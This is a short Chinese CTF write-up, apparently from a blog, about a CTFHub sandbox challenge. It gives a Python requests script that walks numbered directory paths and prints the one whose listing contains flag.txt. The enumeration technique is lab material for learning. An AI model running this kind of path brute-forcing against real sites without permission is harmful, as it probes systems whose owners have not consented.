zoukankan      html  css  js  c++  java
  • python requests库爆破目录遍历漏洞找flag

    题目的页面

     题目的目录遍历有一定规律,都是数字排序,而且只有两层目录

    #! /usr/bin/env python
    # _*_  coding:utf-8 _*_
    import requests
    
    url = "http://challenge-cf866d8944333af5.sandbox.ctfhub.com:10800/flag_in_here/"
    
    for i in range(5):
        for j in range(5):
            url_ctf =url+str(i)+"/"+str(j)
            r = requests.get(url_ctf)
            r.encoding = 'utf-8'
            get_file=r.text
            if "flag.txt" in get_file:
                print(url_ctf)

     执行后flag在这个页面中

    奶奶问孙子:4+1等于几 孙子说:等于6-1。 奶奶说:你明明知道答案,为什么不说? 孙子说:年轻人不讲5的……..
  • 相关阅读:
    golang变量2
    golang1
    golang api接收get,post请求读取内容方法
    docker2
    docker
    渗透1
    Crawley框架
    spider类
    爬豆瓣阅读遇到的问题
    CrawlSpiders类
  • 原文地址:https://www.cnblogs.com/jasy/p/15341646.html
Copyright © 2011-2022 走看看